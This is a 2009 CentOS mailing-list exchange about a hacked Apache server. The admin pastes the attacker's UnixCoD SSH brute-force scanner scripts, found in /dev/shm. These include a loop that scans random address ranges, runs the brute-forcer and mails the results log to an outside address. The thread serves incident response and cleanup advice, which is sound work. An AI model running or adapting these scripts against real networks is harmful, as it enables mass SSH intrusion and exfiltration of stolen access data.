Re: Centos 5.3 -> Apache - Under Attack ? Oh hell....

"bruce" <bedouglas@xxxxxxxxxxxxx> · Wed, 3 Jun 2009 09:47:26 -0700

so you're going to need to figure out what the hole in your system is/was...
you're going to need to patch it... you're going to need to examine the logs
for logins to your other systems.. as well as examine the ssh logs for
outgoing login attempts from the hacked box to other boxes in your
network...

if the other boxes in your network have webservers that are exposed to the
net, you're going to have to examins them as well...

you're going to have to check for other files (/dev/shm.. etc..) on the
other boxes...

but in all probablity, you should reinstall on the initial box, once you've
resolved how to correct the issue... (this includes analyzing the webserver
apps!!!!!!!)

good luck!

-----Original Message-----
From: Linux Advocate [mailto:linuxhousedn@xxxxxxxxx]
Sent: Wednesday, June 03, 2009 9:33 AM
To: bruce
Cc: CentOS mailing list
Subject: Re:  Centos 5.3 -> Apache - Under Attack ? Oh hell....

BRUCE U ARE A F******* GENIUS MAN !!!!!

u were right bro....thanx for spending the time on this man....

more info below !!!!!!!!!!!!!

----- Original Message ----
> From: bruce <bedouglas@xxxxxxxxxxxxx>
> To: linuxhousedn@xxxxxxxxx
> Sent: Wednesday, June 3, 2009 9:53:24 PM
> Subject: RE:  Centos 5.3 -> Apache - Under Attack ? Oh hell....
>
> hi...
>
> i've seen a few of your threads on your issue of the 'atack' processes
> running from your web server...
>
> i'm replying to you offline, as ......
>
>
> take a look over your box, and let's see what you have...
>

as per yr tip i had found a file called atack under this folder
/dev/shm/unix .... even though i could not locate such a file before.....
i have now removed that file and am now probing the contents of the
/dev/shm/unix folder.....

[root@fwgw unix]# pwd
/dev/shm/unix

[root@fwgw unix]# ls -al
total 4352
drwxr-xr-x 2 apache apache     360 Jun  3 23:47 .
drwxrwxrwt 3 root   root        60 Jun  3 00:24 ..
-rwxr-xr-x 1 apache apache       0 May 19 06:02   124.164.find.22
-rwxr-xr-x 1 apache apache       0 Mar 24 22:28   129.135.find.22
-rwxr-xr-x 1 apache apache       0 Mar 24 22:25   129.find.22
-rwxr-xr-x 1 apache apache       0 May 25 13:54   21.168.find.22
-rwxr-xr-x 1 apache apache   12687 May 25 06:16  60.191.find.22
-rw-r--r-- 1 apache apache       0 Jun  3 23:45   83.182.find.22
-rwxr-xr-x 1 apache apache    4631 Apr 21 17:50   84.2.find.22
-rwxr-xr-x 1 apache apache       0 May 25 06:17   89.38.find.22
-rwxr-xr-x 1 apache apache    2362 May 19 15:28   91.204.find.22
-rwxr-xr-x 1 apache apache     216 May 18  2005   auto
-rwxr-xr-x 1 apache apache 4374933 May 15 19:41  data.conf
-rwxr-xr-x 1 apache apache   15729 Oct 14  2005  find
-rw-r--r-- 1 apache apache    5262 Jun  3 23:45  log
-rwxr-xr-x 1 apache apache     751 May 25 06:33  unix
-rw-r--r-- 1 apache apache       0 Jun  3 23:04   vuln.txt
-rwxr-xr-x 1 apache apache     671 May 25 13:56  x

The contents of  file 'x' are;

#!/bin/bash
echo "[+] PLM prea destept pentru voi : Yuli [+]"
X=0
c=0
while [ $X -le 255 ]
do
c=$RANDOM
let "c %= 255"
echo "[+] Scanam radom class b $1.$c [+]"
./find $1.$c 22
sleep 10
cat $1.$c.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar  $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100 >> log
mail -s $1.$c yuli1989xxx@xxxxxxxxx < log
rm -rf $1.$c.find.22 ip.conf
echo "[+] Scanner a terminat de scanat !"
echo "[+] Next random class b !"
X=$((X+1))

the contents of the file 'unix' are;

#!/bin/bash
if [ $# != 1 ]; then
        echo "[+] Folosim : $0 [b class]"
        exit;
fi

echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]"
echo "[+]   SSH Brute force scanner : user & password   [+]"
echo "[+]        Undernet Channel : #yuli               [+]"
echo "[+][+][+][+][+][+][+] ver 0x10  [+][+][+][+][+][+][+]"
./find $1 22

sleep 10
cat $1.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar  $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100
rm -rf $1.find.22 ip.conf
echo "[+] UnixCoD Scanner a terminat de scanat !"

the contents of 'auto' are;

#!/bin/sh
echo
echo "Enter A class range"
read brange
echo "Enter output file"
read file
crange=0
while [ $crange -lt 255 ] ; do
        echo -n "./assh $brange.$crange ; " >> $file
        let crange=crange+1
done

the contents of 'log' are;

[+] No SSH ->www:www:83.246.113.34
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] No SSH ->www:www:83.246.119.41
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]

Further googling indicates that UnixCod  is a brute force ssh scanner...
what is is odd is that i have fail2ban ruunning ( which blocks IPs after 2
failed attempts) and a 8 letter passwd but i still got hacked....

Guys...any comments....

AND ONCE AGAIN THANKS BRUCE
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!

Regards,
Marco.

_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
http://lists.centos.org/mailman/listinfo/centos